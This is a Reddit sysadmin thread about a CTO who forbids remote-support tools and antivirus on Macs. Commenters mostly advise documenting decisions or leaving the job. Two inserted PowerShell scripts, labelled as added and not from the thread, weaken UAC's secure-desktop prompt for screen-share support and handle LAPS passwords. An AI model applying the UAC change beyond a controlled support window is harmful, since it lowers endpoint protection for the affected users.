Start looking elsewhere. A migration/acquisition that shuffled leadership and now they’re demanding the dismantling of an assault support system? Run.
computerkermit86@reddit
I am such a nephew and I feel deeply insulted now. O_o
pspahn@reddit
Yeah fuck that. I got my A+ and did full MCSE classes at 18 in the 90s. I've walked hillbillies in Mississippi through making a DOS boot disk over the phone so they could play Bass Fishing.
Yeah, I am good.
UserProv_Minotaur@reddit
Doesn’t Windows now have a built in remote assistant?
ASlutdragon@reddit
Don’t look for work arounds. Do exactly as your bosses ask. All you can do is politely make the case for changes you think should be made and then if they don’t take them, oh well. Don’t butt heads with the CTO. Especially one that sounds so arrogant.
sammavet@reddit
Did you ask him the reason why?
cilvre@reddit
I've had similar before, just document and cya, take your time solving issues and working cases. At checkins or reviews, you can bring up the large work load as a reason to either a. Have more people brought on, or b. Provide options for real corporate toolsets for support. When others start complaining about stuff, you can bring the conversation to your manager or the ceo for why the efficiency was lost.
Nexzus_@reddit
Not even a Teams/etc desktop share?
khantroll1@reddit
I was kind of assuming that was what was meant by “guide them over a video call” was guide them over Teams.
Previous-Low4715@reddit
Guide them into looking at a UAC prompt they can’t traverse because they don’t have local admin or LAPS access… I hope
khantroll1@reddit
I mean, that’s kind of on you if you don’t know what they have access to or don’t.
I don’t know what OP is working on with these users.
If the CTO is actually expecting him to do remote administrative work without the use of SOMETHING (privilege escalation software, MDM software, something)… then it's up to him to set the remediation policies.
I can say after years of being a senior I have no idea how you’d manage in OP’s logistical position.
livinitup0@reddit
I mean…. I did a couple years with SfB being my only remote assistance tool.
Tbh, I’m failing to see the unsolvable problem. Pain in the ass sure, but not unsolvable by any means.
If this is just a pure MS cloud shop they're obviously going to rely heavily on Intune, which will handle a whole lot of things you'd need to elevate for if you were connected to a user.
Add Teams screen share and control, RDP… seems doable to me, I've done it with less.
I can see the logic and savings behind it.. especially if MS is rolling out something for remote assistance pretty soon.
Let's not discount that OP might just not be in the know about a big change coming up or even being on the chopping block… which might be taking precedence over their request for a remote solution right now
Other-Illustrator531@reddit
I think it's the last point. A lone role, that position will be gone once everyone is on the new platforms and under core support.
khantroll1@reddit
My understanding is that:
Users are on Macs, which have finicky support in Intune.
At present, OP can’t add machines to a tenant. New machines can’t be added to the old one, and the new one isn’t available to him, and he might be losing access to the old one.
If his intune works or any other MDM, he’s fine (as I said). But if not he’s gotta have something or rack up some travel
Previous-Low4715@reddit
Depends entirely upon a few key details like the organisational risk appetite and the current configuration of local user access. But this isn’t a technical problem, it’s either a communication breakdown or a genuine idiot making roles untenable, and it can’t be solved by a technical solution.
If it’s one of those horror show situations we see on here occasionally where everyone has local admin access, that’s a massive security issue but also provides a technical route to adopt this ridiculous positioning.
I've been management for a few years now but if I were still doing senior sysadmin, in his position I would simply get it in writing as published guidance. I'd support the customer until a UAC escalation prompt appears, then tell them no further support is available because of a new policy from named CTO and point them to the published guidance. Once you hit critical mass of enough customers unable to work, heads of department and line manager executives will solve the problem for OP through direct outside on the CTO. The key thing for OP is to get the guidance in writing and to have a product in mind when he's very quickly asked to get one up and running. Most of the Intune premium suite is coming to E5 soon, so that might be an option.
IF CTO is a career executive who has no technical knowledge he may genuinely not understand why you can’t simply cancel the remote support contract to save a few bucks. All OP can do is lay out very simply what can and can’t be done without a remote support tool, in writing, and escalate.
Nexzus_@reddit
Ah, video call.
My mind was taken back to my IBM Global Services where I had to do blind troubleshooting and felt for the OP.
khantroll1@reddit
Oh, definitely been there and done that.
Still do it occasionally
Substantial-Fruit447@reddit
Depends on how far the support needs to go.
Sharing over Teams Call does not allow any UAC elevation activity.
doktormane@reddit
There's a reg setting to get around that but ideally you want to only temporarily disable the feature. You could push an Intune script an hour or so before connecting and then take the device out of the assignment group after you're done.
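The "reg setting" being referred to is the UAC policy value PromptOnSecureDesktop, which makes the elevation prompt appear on the secure desktop that screen-share tools cannot see. As an added example, not from this thread or from any commenter, this PowerShell disables it for a support window and registers a one-shot task that restores it and deletes itself, so the weakened state cannot outlive the session even if the device drops out of the Intune assignment group late. It assumes it runs elevated (for instance as SYSTEM from an Intune platform script); the task name is a hypothetical placeholder.

```powershell
# Added example (not from the thread). Temporarily move the UAC prompt off the
# secure desktop so a Teams/Zoom "request control" session can interact with it,
# with a guaranteed restore. Assumes an elevated context (SYSTEM via Intune).
$regPath     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$valueName   = 'PromptOnSecureDesktop'      # real UAC policy value: 1 = secure desktop on
$taskName    = 'RestoreSecureDesktopUAC'    # hypothetical scheduled-task name
$windowHours = 2                            # length of the support window

function Disable-SecureDesktopTemporarily {
    param([int]$Hours = 2)

    # Log the starting value so the change is visible in the Intune script output.
    $current = (Get-ItemProperty -Path $regPath -Name $valueName -ErrorAction SilentlyContinue).$valueName
    Write-Output "Current $valueName = $current (empty means the default of 1)"

    Set-ItemProperty -Path $regPath -Name $valueName -Value 0 -Type DWord

    # One-shot task: flip the value back to 1, then remove itself.
    $restoreCmd = "Set-ItemProperty -Path '$regPath' -Name '$valueName' -Value 1 -Type DWord; " +
                  "Unregister-ScheduledTask -TaskName '$taskName' -Confirm:`$false"
    $action    = New-ScheduledTaskAction -Execute 'powershell.exe' `
                     -Argument "-NoProfile -Command `"$restoreCmd`""
    $trigger   = New-ScheduledTaskTrigger -Once -At (Get-Date).AddHours($Hours)
    $principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
    # StartWhenAvailable: if the laptop is asleep at the trigger time, restore on wake.
    $settings  = New-ScheduledTaskSettingsSet -StartWhenAvailable

    Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger `
        -Principal $principal -Settings $settings -Force | Out-Null
    Write-Output "Secure desktop prompt disabled; restore scheduled for $((Get-Date).AddHours($Hours))"
}

function Restore-SecureDesktopNow {
    # Call this as soon as the support session ends instead of waiting for the task.
    Set-ItemProperty -Path $regPath -Name $valueName -Value 1 -Type DWord
    Unregister-ScheduledTask -TaskName $taskName -Confirm:$false -ErrorAction SilentlyContinue
}

Disable-SecureDesktopTemporarily -Hours $windowHours
```

Restore-SecureDesktopNow can be pushed as a second script once the ticket is closed; either path leaves the device back at the hardened default.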
Nexzus_@reddit
Yeah, ran into that a few times.
boffhead@reddit
Document the fuck out of the AV thing!
masterne0@reddit
Sounds like the guy either knows someone or is related to someone higher in the food chain and got to be CTO and yet doesn't know anything about technology.
If it's going bad, maybe start dusting off your resume and start looking at jobs that actually do know what they are doing and won't turn into the clown show that your company is going to turn into because of this one idiot.
Nik_Tesla@reddit
More like Chief Technology Obstacle
IdleWanderlust@reddit
Dumb policy but I’m assuming you’re in a Windows environment. Why can’t you use the built in quick assist?
ProfessionalEven296@reddit
He says that they all have MacBooks.
IdleWanderlust@reddit
Ah I missed that part. The Mac has built in screen sharing too and it can also be done through FaceTime, or other allowed software. Still a stupid policy but one that can be worked around with approved tools.
ProfessionalEven296@reddit
Totally agree on the "Stupid Policy" bit. Some people should not be in management.
crankysysadmin@reddit
You need a new job like yesterday.
We support a lot of Macs and we like Macs at my company but we definitely need threat protection software on the Mac and the Windows machines. It finds stuff ALL. THE. TIME. on both macOS and Windows.
independent_observe@reddit
Get out now. They have absolutely zero respect for you and your experience
socra@reddit
Send this thread to the global CEO. Problem solved :)
Wizdad-1000@reddit
Get this in writing 1000% Wowzers! This is going to backfire HARD. GL
Vectan@reddit
Short: Run. No remote tools is one thing, no antivirus because Mac is just flat out stupid. A cyber event or incident is just a matter of time with this kind of mindset.
Long: Document everything and keep copies. Once you CYA. Let the users feel the pain, keep being professional, do your best, but eventually the pain should (hopefully) bubble up to him. Polish the resume and look for a new job, cause that kind of person will absolutely blame you or anyone else they can when stuff hits the fan.
If you have your CYA, maybe something legal will happen in your favor. Even if not you can clearly show how you handled things professionally and did the best you could with what you were provided and allowed.
Sorry you have to deal with that. All the things you did were spot on (proactive, advocate to best support your customers, etc.). Best of luck.
Leather_Secretary_13@reddit
Honestly, look for other work dude.
New company ownership, new rules, new meetings, and you are not part of them.
It's only a matter of time until they get to handling what to do with your roles.
MyWifesBoyfriend_@reddit
You don't need remote access tools to support end users.
CoffeeOrDestroy@reddit
Found the CTO
MyWifesBoyfriend_@reddit
My company has remote access tools restricted too, even the functionality in Zoom. Remote access is a huge security risk, even if it is less inefficient than just doing it yourself for the end user.
100% remote, globally distributed company too.
CoffeeOrDestroy@reddit
Who handles admin rights?
MyWifesBoyfriend_@reddit
Tools like Admin by Request for JIT admin access. Use is audited
UninvestedCuriosity@reddit
Absolute cinema. Please write more like this.
ccsrpsw@reddit
He’s moving everyone to Mac’s? You won’t have any E3 or other support tools then. I know there are Mac solutions but if you come from a Windows world… good luck without some level of MDM. And AV.
thunderbird32@reddit
At least Defender for Endpoint supports Mac, so that's *something*.
dinominant@reddit
How do you do anything that requires local admin access without compromising the system by revealing the local admin password?
Do you have access to ship laptops around and a few spare units?
Maintain compliance by having a spare laptop at each location and cross-ship to fix?
Main_Ambassador_4985@reddit
Does the MDM have remote access built-in or at least a remote scripting shell?
If there is no MDM the MacBooks are basic company purchased BYOD.
Macs need XDR and Vulnerability scanning.
In our system the Macs are always triggering events because our MDM is slow to sync and the users think they are invincible.
WesDoesStuff@reddit
Windows 11 has Quick Assist / Microsoft Remote Assist. You can set up default configs and authorized user groups in group policy. Sucks if you need to run anything elevated but better than nothing. You can also have them screen share and request control with Teams.
MojArch@reddit
I have 1 recommendation. Document any and everything he says with his own hands and knowledge.
We have a kind of similar situation and all I did was ask them to write it as an official letter and order.
Now when anyone complains about the slow flow of fixing systems I just point to those orders and they get immediately quiet.
flsingleguy@reddit
That’s wild. I am an IT Director and properly secured remote access is such a game changer for so many different roles.
InflateMyProstate@reddit
That’s incredibly frustrating. A lot of users I’ve worked with in the past won’t put up with a 2 hour video call where you’re trying to troubleshoot and give them commands or keys to press where the alternative is you just remoting in and driving the session to fix the issue while they can walk away or do something else. Plus, it eats into your day where you could be performing other tasks and turns a routine function into a multiple hour fiasco. Not to mention, the frustration of yourself and the end user. I’ve had to do this a few times where remote control was not available and both the user and I wanted to pull our hair out. That’s absurd, if the CTO is unwilling to budge and you’ve done everything you can, I would sadly say it’s time to start applying to other jobs. I would lose my mind. Good luck
Opposite_Bag_7434@reddit
OP if you are using Entra ID why not use Quick Assist?
By the way it is possible to do much of what you need using whatever conferencing platform, like Teams, Zoom, etc the company is using. You may need to have the user point the mouse and press keys on the keyboard, but it is very possible to support users this way. Servers not so much.
This is still a hard situation for sure.
rodder678@reddit
Troubleshoot? Remote access? SSPR is enabled. Anything else, click Fresh Start in Intune. If they won't go away, send them AI slop to try until their machine isn't recoverable. The key is to stop caring whether anything works.
/s
Horror-Squirrel4142@reddit
The no-antivirus-because-MacBooks line is a massive red flag. macOS malware has been growing 30%+ year over year, and every compliance framework (CIS, SOC2, ISO 27001) requires endpoint protection regardless of OS. That alone tells you his decisions are not risk-based, they are ego-based.
Document every incident where the lack of remote access caused delays. Track the hours wasted on video call troubleshooting vs what a 30-second remote session would have taken. When something breaks badly enough that leadership notices, you will have the paper trail to show this was a predicted and preventable failure.
6Saint6Cyber6@reddit
No help on the remote access tool other than to track how long these issues take to resolve so you have a comparison.
Get the no EDR in writing and make sure legal knows the stance. Outside of the extremely high likelihood that no cyber insurance company will cover the company without it, I can’t imagine the lawsuits after a breach with no EDR on endpoints.
zmttoxics2@reddit
Depending on the video call tool you can usually request control and drive the session. Not perfect I know but better than 100% verbal.
the_syco@reddit
Does this include Teams? Used it in previous companies to remote control over basic non-admin functions.
ByronScottJones@reddit
My advice is document everything, and do exactly what he says. And don't just keep screenshots where he can delete them. Hard copies with signed dates on them. When this blows up, he will point the finger at you. Be ready with the receipts.
zer04ll@reddit
If you are a Windows company, use Quick Connect; it's built into Windows and allows remote control. You are not installing anything; it's made by Microsoft and built in. If you're not using only Windows, good luck.
ProgressBartender@reddit
Op made it sound like they use MacBooks
zer04ll@reddit
Apple just made their in-house MDM way better for deployment. It takes a bit to set up with Apple, way more than others, but they do have a built-in solution as well.
HailYurii@reddit
What is your title?
Imhereforthechips@reddit
I have had only 1 jackass that was really rigid. I didn’t butt heads with him, but did have very open conversations about his perspective and why he was adamant about xyz. I found it much more helpful to listen and fully understand his logic. After that, it was easy to get things done because I knew what his modus operandi was.
BIG_SCIENCE@reddit
His response: "We don't need antivirus because we use MacBooks."
lol you are in danger. you need to find another job.
mysticalfruit@reddit
Get that shit in writing..
======== CUT HERE ========
Dear CTO,
I am writing to clarify for my records that our company's official policy is to forbid the use of all remote access tools and all support is to be done over video link.
Thanks,
uw4yn3
======== CUT HERE ========
Honestly, that's a bullshit policy.. I really hope you're getting paid by the hour!
braliao@reddit
Start working on your resume.. It's time to leave.
N3rdScool@reddit
Imagine needing to ask the person to install AnyDesk, lol. I guess that's blocked though, lol. What a clusterfuck.
musiquededemain@reddit
Your CTO should not be in that position.
Isi0815-2@reddit
Maybe you report one level higher than this person, to somebody who bought your company.
Just to check if it is for killing your firm.
Get a new job?
Emotional_Garage_950@reddit
Dude sounds like either an idiot, or it actually is definitely budget related.
Use Teams screen share if that's allowed, and provide the LAPS password to the user if elevation is required. Configure LAPS to rotate the password after it gets used.
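The LAPS workflow described in the comment above (read the local admin password for a one-off elevation over the call, then make sure it rotates after use), as an added PowerShell example that is not code from the thread. It assumes Windows LAPS with passwords escrowed to Entra ID, the Windows LAPS PowerShell module on the helpdesk machine, and Graph sign-in with rights to read LAPS passwords; `<DEVICE-OBJECT-ID>` is a placeholder for the device's Entra object ID. The registry paths and the default values for the post-authentication settings are taken from the Windows LAPS policy documentation.

```powershell
# Added example, not from the thread. Two halves of the "LAPS over a video call" routine:
#   1. helpdesk side: read the current Windows LAPS password for an Entra-joined device;
#   2. endpoint side: verify that policy rotates the password after it is used, with an
#      immediate-rotation fallback if it does not.
# Assumptions: Windows LAPS module present (Windows 11 22H2+ / Server 2025 or the April 2023
# update), Graph sign-in rights to read LAPS passwords, '<DEVICE-OBJECT-ID>' is a placeholder.

Import-Module LAPS

function Get-OneOffAdminPassword {
    param([Parameter(Mandatory)][string]$DeviceObjectId)
    # Entra-joined devices escrow the password in Entra ID; Get-LapsAADPassword reads it.
    # -AsPlainText is needed because the password is about to be dictated to the user.
    $entry = Get-LapsAADPassword -DeviceIds $DeviceObjectId -IncludePasswords -AsPlainText
    [pscustomobject]@{
        Device   = $entry.DeviceName
        Account  = $entry.Account
        Password = $entry.Password
        Expires  = $entry.PasswordExpirationTime
    }
}

function Test-LapsPostAuthRotation {
    # Runs on the endpoint. Windows LAPS reads policy from the CSP (Intune) path first,
    # then Group Policy. PostAuthenticationActions: 1 = reset password, 3 = reset and log off,
    # 5 = reset and reboot (documented default 3). PostAuthenticationResetDelay is in hours
    # (documented default 24; 0 disables post-auth actions entirely).
    $sources = @(
        'HKLM:\SOFTWARE\Microsoft\Policies\LAPS',                          # CSP / Intune
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\LAPS'    # Group Policy
    )
    foreach ($path in $sources) {
        $p = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue
        if ($null -eq $p) { continue }
        $actions = if ($null -ne $p.PostAuthenticationActions) { $p.PostAuthenticationActions } else { 3 }
        $delay   = if ($null -ne $p.PostAuthenticationResetDelay) { $p.PostAuthenticationResetDelay } else { 24 }
        return [pscustomobject]@{
            PolicySource    = $path
            Actions         = $actions
            DelayHours      = $delay
            RotatesAfterUse = ($actions -in 1, 3, 5) -and ($delay -ne 0)
        }
    }
    # No LAPS policy delivered at all: the password never rotates on use.
    [pscustomobject]@{ PolicySource = 'none'; Actions = $null; DelayHours = $null; RotatesAfterUse = $false }
}

function Invoke-ImmediateRotation {
    # Fallback when Test-LapsPostAuthRotation reports no rotation: run elevated on the
    # endpoint once the ticket is closed. Rotates the local admin password now and
    # re-escrows it, so the value read out loud on the call is no longer valid.
    Reset-LapsPassword
}

# Usage:
#   Helpdesk (once per ticket):   Get-OneOffAdminPassword -DeviceObjectId '<DEVICE-OBJECT-ID>'
#   Endpoint (elevated, via Intune script or by the user): Test-LapsPostAuthRotation
#   If RotatesAfterUse is $false:   Invoke-ImmediateRotation
```

The policy check matters because a password dictated over a call is effectively disclosed; the point of the post-authentication action is that the disclosure stops mattering within the configured delay, and `Reset-LapsPassword` closes that window manually where the policy does not.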
javierdapear@reddit
jamf is the solution, you can also deploy laps with intune
FuckinHighGuy@reddit
As I said above, Jamf for Macs is pretty much the standard.
Good call.
Emotional_Garage_950@reddit
you can, if you want to wipe and re-enroll the Mac (this is the case with Intune, idk about Jamf. also don’t know if OP already has laps set up 🤷♂️)
anonfreakazoid@reddit
Don't call it anti virus. It's next-generation Endpoint Detection and Response.
It's not remote access. It's MDM for securing and configuring mobile devices and RMM for deep, proactive monitoring and maintenance.
If you don't know why he is banning it, think of responses if/when he does tell you.
poizone68@reddit
I assume CTO in this context is Chief Troglodyte Officer?
PlayingDoomOnAGPS@reddit
Who hasn't? This is endemic to IT.
RikiWardOG@reddit
I mean 90% of the time zoom is enough for us. Ask for remote control and then just drive from there
largos7289@reddit
LOL, the CTO is a flaming idiot. Like, I'm not exaggerating here, he's a complete moron. I mean, way way back in the day his case may have held water about the MacBooks, since they maybe had 10% of the marketplace and were weird one-off cases in businesses. I think I may have run into one back in the 80's-90's besides the Apple IIe I used in HS/college. Anyway... I would sure as shit want a written confirmation that this is his policy. The only way this is going to get resolved is CEO-level intervention. He's not going to listen to the likes of you... evidently.
Scrug@reddit
Some companies do not use remote access tools. They are a massive security hole. The company I work for does not, but we do not hire 100% remote. The expectation is that if I can't fix your issue remotely then you'll have to come into the office.
I don't know how it's possible to support 100% remote employees without some kind of access tool. Do these users have admin access on their devices?
TheEminentFascism@reddit
The CTO thinks MacBooks don't need antivirus and remote access is unnecessary, so honestly just document every ticket, every hour spent on video calls, and every issue that could've been resolved in minutes, then when the security breach or compliance audit hits you can pull up the email trail showing you asked multiple times and were told no.
Swimming-Hawk-8639@reddit
Use Quick Assist. Better than nothing. It generally comes preinstalled on every Windows device. Maybe this doofus CTO isn't aware of it.
evolutionxtinct@reddit
I wish you the best OP, that CTO has no idea what they are doing….
800oz_gorilla@reddit
I have banned cloud-based remote access software. Point-to-point only; use a jump box if you're not able to use an SD-WAN tunnel. Then use our program in direct mode.
That said, it's painful, and if he's serious about security, point out that OSes are locking down the desktop to prevent you from seeing security screens (secure desktop). That's why on a Teams screen share you can't see a UAC prompt.
I'm also pushing hard for system-context app pushing with no local admin access for the user. Hopefully the Microsoft Intune Suite coming in July will help; you will get access to Endpoint Privilege Management.
But if you're only on Macs, Lord help you. I have no advice to offer because no AV, not even defender, with as many vulnerabilities that are being exploited due to AI efforts, that CIO is a dumbass.
miscdebris1123@reddit
No antivirus/edr? What does your cyber insurance say?
badaz06@reddit
How about using teams?
discosoc@reddit
Just stop stressing. Let the tickets pile up while you comfortably work through each “over the phone” with a complete lack of urgency.
ihaxr@reddit
You need to stop making waves over hypothetical situations. If they're getting new laptops they're probably going to be a standard image and on the new company's infrastructure, and you won't be expected to support most of the stuff anyway.
Like what? Roll out a handful of new laptops to users and document the problems and why/how you taking control of their workstation is necessary. If it's a big enough issue, the users will complain up their chain to the IT folks responsible. If they still refuse to fix it, it's not really your problem...
F0LL0WFREEMAN@reddit
How did he become a CTO? He might be an idiot.
shaggy24200@reddit
Start sending expense reports for on-site visits!
CoffeeOrDestroy@reddit
Does everyone have admin rights in their system too or are you supposed to provide admin credentials verbally? What is your company’s policy on disclosing passwords? Please put all of this in writing no matter what. We all know where the CTO will point his fingers when it hits the fan.
gunzstri@reddit
This is just crazy. No remote tools? How are you supposed to solve the issue quickly? Time to update your resume and leave.
TheShmoe13@reddit
Until he said (basically) "Macs don't need A/V" my working theory was that they do have RMM, but just don't want to share access to it with you. Which likely means that you are going to be let go at the first possible moment.
Assuming this CTO is the global tech leader for this company and not a regional CTO, you don’t want to be here anyways. Let the complaints pile up, and work on your résumé.
If he’s not the global org’s CTO and just a regional guy, you can play politics, have users complain directly to global management about the change in support regime and how much worse it is after this CTO came into the picture. But I wouldn’t hold my breath.
Watsonwes@reddit
I would quit that’s insanity
jks513@reddit
The leadership is honestly trying to get him to quit from that description.
CrimsonFlash911@reddit
Man, this sounds like the time I proposed an automated patching solution to a previous boss and he said “if you can’t do it with a spreadsheet no program would help” to which I replied “we’re talking about patch management not keeping track of line items” and he said “I’m the boss and you’re going to do what I say”.
So I did - and I left - and I never looked back. Some people are impossible to manage both up and down.
RantyITguy@reddit
Not having remote access or having to troubleshoot macs in a business environment would be stressful.
Having to deal with both? ... I'd lose my damn fucking mind. Just collect your paycheck and let his stupidity fall in on itself.
No shame in working slower because you have probably the most legitimate reason in the universe as to why support will be slow.
Take my advice, don't try to be a team player and stress about things not getting done. It will kill you inside. Trust me.
jhuseby@reddit
I’d start doing the bare minimum to keep your job while looking for a better work environment.
thebbtrev@reddit
I think this could be cross-posted to r/maliciouscompliance
Jesus
strongest_nerd@reddit
How'd he become CTO? Owner's brother?
DontTakePeopleSrsly@reddit
Sounds like he wants you to quit, so find another job and give him what he wants.